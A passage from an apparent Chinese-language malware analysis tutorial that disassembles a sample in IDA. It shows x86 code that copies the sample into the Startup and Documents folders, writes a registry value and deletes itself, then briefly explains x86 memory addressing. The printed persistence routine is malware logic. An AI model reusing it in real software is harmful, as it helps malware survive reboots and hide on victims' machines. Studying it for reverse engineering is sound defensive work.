1.5.2 反組譯並觀察重要邏輯
接下來用IDA打開sample_mal.exe,看一些重要的程式邏輯。
- 首先來看複製0.exe和1.exe的地方。
push 400h ; nSize lea eax, [esp+85Ch+szMe] push eax ; lpFilename push ecx ; hModule call ds:__imp__GetModuleFileNameA@12 ; GetModuleFileNameA(x,x,x) mov esi, ds:__imp__SHGetSpecialFolderPathA@16 ; SHGetSpecialFolderPathA(x,x,x,x) push 0 ; fCreate push 7 ; csidl lea ecx, [esp+860h+szPath] push ecx ; pszPath push 0 ; hwnd call esi ; SHGetSpecialFolderPathA(x,x,x,x) ; SHGetSpecialFolderPathA(x,x,x,x) mov edi, ds:__imp__lstrcatA@8 ; lstrcatA(x,x) push offset String2 ; "\\0.exe" lea edx, [esp+85Ch+szPath] push edx ; lpString1 call edi ; lstrcatA(x,x) ; lstrcatA(x,x) mov ebx, ds:__imp__CopyFileA@12 ; CopyFileA(x,x,x) push 0 ; bFailIfExists lea eax, [esp+85Ch+szPath] push eax ; lpNewFileName lea ecx, [esp+860h+szMe] push ecx ; lpExistingFileName call ebx ; CopyFileA(x,x,x) ; CopyFileA(x,x,x) push 0 ; fCreate push 5 ; csidl lea edx, [esp+860h+szPath] push edx ; pszPath push 0 ; hwnd call esi ; SHGetSpecialFolderPathA(x,x,x,x) ; SHGetSpecialFolderPathA(x,x,x,x) push offset a1_exe ; "\\1.exe" lea eax, [esp+85Ch+szPath] push eax ; lpString1 call edi ; lstrcatA(x,x) ; lstrcatA(x,x) push 0 ; bFailIfExists lea ecx, [esp+85Ch+szPath] push ecx ; lpNewFileName lea edx, [esp+860h+szMe] push edx ; lpExistingFileName call ebx ; CopyFileA(x,x,x) ; CopyFileA(x,x,x) lea eax, [esp+858h+szPath] lea edx, [eax+1]loc_401443: mov cl, [eax] inc eax test cl, cl jnz short loc_401443sub eax, edx push eax ; path lea eax, [esp+85Ch+szPath] push eax ; root call ?SetRegValue@@YAHPAUHKEY__@@PAD11H@Z ; SetRegValue(HKEY__ *,char *,char *,char *,int) add esp, 8 call ?SelfDelete@@YAHXZ ; SelfDelete(void) push 0 ; nExitCode call ds:__imp__PostQuitMessage@4 ; PostQuitMessage(x) jmp loc_40151F- 其中
SetRegValue與SelfDelete分別用來設置註冊表值以及將自身刪除
- 其中
- x86使用中括號
[]表示記憶體位址mov ecx, [eax]: 把ECX寫為地址EAX處的值mov [eax], ebx: 把EBX值寫入地址為EAX的記憶體